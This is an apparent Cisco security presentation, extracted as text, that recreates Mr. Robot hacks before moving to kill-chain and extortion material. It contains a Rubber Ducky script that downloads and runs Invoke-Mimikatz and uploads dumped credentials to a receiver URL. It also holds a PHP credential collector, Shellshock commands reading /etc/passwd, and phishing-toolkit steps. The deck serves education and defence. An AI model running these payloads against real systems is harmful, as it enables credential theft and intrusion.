Cisco Security Experts Explore Hacking Techniques in Mr. Robot and Hollywood

Vince Kornacki, Senior Security Consultant, Cisco
Sean Mason, Director of Incident Response, Cisco
October 12, 2017
Exploring the Anatomy of a Cyber-Attack
Security Through the Eyes of a Hacker

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Hollywood’s Depiction of Hacking
“I dropped a logic bomb through the trap door.”
-Swordfish
“A gigabyte of RAM should do the trick”
-Under Siege 2
“I’ll create a GUI interface using Visual
Basic, see if I can track an IP address.”
-CSI
“Isolate the node and dump it on the
other side of the router.”
-NCIS

The award for Hollywood’s best
attempt at depicting hacking goes to…

Elliot Hacks Steel Mountain Thermostat

How’d He Do It?
• Social Engineers his way inside the building
• Splice Raspberry Pi into the BACnet (Building Automation and Control
Network) network lines connected to the thermostat

How’d He Do It?

Angela Hacks Her Boss’ Evil Corp Credentials

How’d She Do It?
Rubber Ducky USB
• Keystroke injection attack tool
Invoke-Mimikatz
• Script that reflectively injects Mimikatz into memory using Powershell

Proof of Concept
1. Write the Payload
• Open administrator command prompt
DELAY 1000
GUI r
STRING powershell Start-Process cmd –Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
• Obfuscate command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER

Proof of Concept
1. Write the Payload (continued)
• Download and execute “Invoke-Mimikatz” script then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString(MimikatzScriptURL:’);
$output = Invoke-Mimikatz -DumpCreds;
(New-Object Net.WebClient).UploadString(‘PHP_Creds_Receiver_URL’, $output)”
ENTER
DELAY 15000
• Clear the Run history and exit
STRING powershell "Remove-ItemProperty -Path ’PathToRunMRU'
-Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
ENTER

Proof of Concept
2. Encode the Payload
java -jar duckencode.jar -i invoke-mimikatz.txt -o inject.bin
3. Set up Web Server
<?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
file_put_contents($file, file_get_contents("php://input")); ?>

Proof of Concept
4. Deploy Attack

Elliot Hacks the Prison

Spoofing a Bluetooth Connection

How’d He Do It?
1. Enable Bluetooth 2. Scan for Bluetooth Devices

How’d He Do It?
3. Spoof the MAC Address of the Keyboard
4. Link Bluetooth Device to the Cop’s Laptop
5. Hack the Prison

Elliot Hacks Tyrell’s Email Account

How’d He Do It?
wget –U “() test;];echo ”Content-type: text/plain”; echo; echo; /bin/cat
/etc/passwd” http://evilcorp-intl.com/login.email.srf?wa=wsignin1.0&rpsnv=4d
1. Exploit Shellshock vulnerability using wget
2. Use John the Ripper on /etc/passwd (Elliot should have used /etc/shadow)
./john /etc/passwd

Simple Attack That Works
GET / HTTP/1.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,fr;q=0.6
Cache-Control: no-cache Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/37.0.2062.124 Safari/537.36
Host: example.com
Edit “User-Agent” Header to look like “HTTP_USER_AGENT=() { :; }; /bin/eject”

Darlene Phishes Evil Corp

Phishing Website Proof of Concept
1. Start Up The Social Engineer Toolkit (SET)

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
2. Choose Attack Method

3. Configure Attacker’s Website and Kali Box

3. Configure Website and Kali Box (continued)

4. Create Website and Start Server

5. Victim Visits Phishing Site

6. Victim Is Owned

Cisco Consultants Use These Tools and Techniques
Application & Penetration Team Services
• External Network Penetration Test  Exploit software vulnerabilities such as
Shellshock
• Internal Network Penetration Test  Use post-exploitation tools like “Mimikatz”
and “John the Ripper” to compromise authentication credentials
• IoT Security Assessment Manipulate IoT protocols like BACnet using a
Raspberry Pi
• Social Engineering Assessment  Launch phishing attacks using tools like the
Social Engineer Toolkit (SET)

Penetration Testing Methodology

Cisco Incident Response Goes To Hollywood

Security Advisory Services
 Incident Response
 Security Strategy and Architecture
 Compliance
 Privacy and Risk Management
 Security Assessments and Penetration
 Network and Infrastructure
 Application and System
 Physical
Benefits
 Higher confidence in what is actually
happening in your network, including
greater visibility and deeper
understanding of your operations and
infrastructure
 Identify security gaps, ineffective
operational processes and poorly
designed technology security controls

Cisco Incident Response Services
A Holistic Portfolio for Your Organizations Needs
Proactive
Threat Hunting
Am I currently
compromised?
Emergency
Incident Response
I need help right
now.
IR
Tabletop Exercises
I need to know
we will respond
correctly.
Incident Response
Retainers
I want to know I
have a team
standing by.
IR Plans &
Playbooks
Am I missing
anything needed
to respond?
Included in IR Retainers
IR Readiness
Assessments
I need a plan for
when an incident
occurs.

300+
Full Time Threat
Intel Researchers
1100+ Threat Traps
Threat Intel
1.5 Million
Daily Malware
Samples
600 Billion
Daily Email
Messages
16 Billion
Daily Web
Requests
Honeypots
Open Source
Communities
Vulnerability
Discovery (Internal)
Product
Telemetry
Internet-Wide
Scanning
Customer Data
Sharing
Programs
Service Provider
Coordination
Program
Open
Source
Intel
Sharing
3rd Party Programs
(MAPP)
Industry
Sharing
Partnerships
(ISACs)
Intel Breakdown
20 Billion
Threats Blocked
Intel Sharing
500+
Participants
Millions
Of Telemetry
Agents
4
Global Data
Centers
100+
Threat Intelligence
Partners

Malware outbreaks
Top things we are seeing
1
2
3
4
Data Exfiltration
Ransomware
Insiders

Nyetya: Helping Customers Respond Quickly
Immediate Access
to named
Responders
Urgent Notification
with unpublished
details
IR onsite in Ukraine
working with Talos
Threat Researchers
Quick Access
to Incident Responders
and Intelligence
Emergency
Customers
Emergency
Bulletin
Source
M.E. Doc
Retainer
Customers

Kill Chain (KC)
“Intelligence-Driven Computer Network Defense Informed by Analysis of
Adversary Campaigns and Intrusion Kill Chains”, Lockheed Martin
bit.ly/killchain
KC1- Reconnaissance:
Collecting information about the
target organization
KC2- Weaponization: Packaging
the threat for delivery
KC3- Delivery: Transmission of the
weaponized payload
KC4- Exploitation: Exploiting
vulnerabilities on a system
KC5- Installation: Installing
malware on a target
KC6- Command & Control:
Providing “hands on the keyboard”
access to the target system
KC7- Actions on Intent: The
attacker achieves their objective
(e.g. stealing information)
Recon
Weapon-
ization
Delivery
Exploitation
Installation
C2
Actions on
Intent

CUSTOMER
CASE STUDY
Organization’s testing/development
network environment targeted, which
lacked security controls and monitoring.
Attackers maintained persistence in the
environment for 5+ months.
C2 malware with zero A/V detection rate,
which was utilized for persistence into
environment.
Deployed StealthWatch into existing
infrastructure.
Deployed AMP for Endpoints to facilitate
endpoint, network analysis, and
remediation.
Malware reverse engineering, memory
forensics, & disk forensics performed on
affected hosts.
App Pen Testing group conducted
application hardening post-incident
response.
ResponseIncident
Telecommunications
Escalated to Cisco IR after law enforcement
notification
Targeted attack by nation state
actor.
Intelligence
Outcomes
Cisco StealthWatch deployment provided
enhanced visibility into infrastructure,
which identified additional security gaps.
Umbrella Investigate utilized for
monitoring primary C2 server.
Cisco provided SME’s to assist in
response efforts to identify, contain,
and eradicate the malware.
Cisco utilized proven hunt methodologies
and techniques for an advanced adversary
in a large environment, while performing
forensic methodologies for root cause
analysis.
People Process Technology
Revenue
: $3B+
Employees:
100k+

Dynamic Threats
Objective
Example
Skill
Potential
Data
Targets
Named
Actors
State
Sponsored/APT
Economic, Political
Advantage, Destruction
Intellectual Property
Theft, DDOS
Very High
Intellectual Property,
Negotiation,
National Intelligence
APT1, Energetic
Bear
Cyber
Crime
Financial
Gain
Credit Card Theft
High
Credit Card Data,
Personal
Identifiable
Information, Health
Records
Russian Business
Network (RBN)
Hacktivism
Defamation,
Destruction, Press &
Policy
Website
Defacements, DDOS
Low - Med
Access to the Network,
Compromising
Information
Syrian Electronic Army,
LizardSquad,
Anonymous
Nuisance
Access &
Propagation
Botnets & Spam
Low
Sensitive
Information,
Vulnerable Data
General Malware
Revenge, Destruction,
Monetary Gain
Insiders
Destruction,
Theft
Med
Intellectual
Property,
Compromising
Information
Jimmy, Suzy, Sally,
Johnny

Anatomy of the Attack
• Collecting information about the
organization
• Port Scan (e.g. Nmap)
• Network Logon from Local
Administrator Account
Reconnaissance
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V

Typically, we don’t see KC2;
however malware analysis of
“C2malware.exe” provided some
insight into payload/ capabilities.
Weaponization
00-00-00-AA-AB-AB |
192.168.1.1 | HostName |
Administrator | C2Domain.com |
AcmeIncResearch
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V

• Network Logon from
Administrator Account
• No password required
• Transmission of C2malware.exe
• Attacker(s) choice
• No Firewall
• No A/V
Delivery
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V

• Exploitation? None required
• No firewall
• No password required
Exploitation
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V

• Install C2malware.exe on target
machine
Installation
01/01/2017 00:02:00 UTC
C:Windowssystem32C2malware.exe
01/01/2017 00:00:30 UTC
C:UsersAttackerC2malware.exe
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V

• C:Windowssystem32C2malwa
re.exe
• Persistence via Run Key
• Beacons out over port 80 to C2
node
Command and
Control (C2)

• Remote backdoor via
C2malware.exe with the
following capabilities:
• Remote Shell
• Read/Write/Execute File(s)
• Create Tasks
• List Drives
Actions on
Objectives
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V

The practice of obtaining something, especially money,
through force or threats
Extortion Defined

Attribution was simpler

First forays into e-extortion
• 2007 FBI release of warning about online extortion mirroring
mafia tactics

Lizard Squad Gaming DDoS

DDOS “Protection” Racket

Armada Collective DHS Warning

Copy Cat Profiteering

Data Breach Response Phishing
Scammers leveraged breaches of adult-themed websites to scare victims
into ransom payments

Ransomware
http://www.welivesecurity.com/2017/01/05/killdisk-
now-targeting-linux-demands-250k-ransom-cant-
decrypt/
http://blog.talosintel.com/2016/07/ranscam.html

Doxware
• First started seeing this over a year ago
• Becoming more mainstream
• New frontier of ransomware
• Data Exfiltration
• Encryption of Data
• Extortion
• Data leakage

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Resources
Cisco Incident Response Team
If you are currently experiencing an incident, please
contact us at: 1-844-831-7715
Or email IncidentResponse@cisco.com
Cisco Security
Services: https://cisco.com/go/securityservices
Blogs: https://blogs.cisco.com

“I drink and I hack things” – T. Lannister

Cisco Security Experts Explore Hacking Techniques in Mr. Robot and Hollywood

Cisco Security Experts Explore Hacking Techniques in Mr. Robot and Hollywood

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Viewers also liked

Viewers also liked (19)

Similar to Cisco Security Experts Explore Hacking Techniques in Mr. Robot and Hollywood

Similar to Cisco Security Experts Explore Hacking Techniques in Mr. Robot and Hollywood (20)

More from Cisco Canada

More from Cisco Canada (20)

Recently uploaded

Recently uploaded (20)

Cisco Security Experts Explore Hacking Techniques in Mr. Robot and Hollywood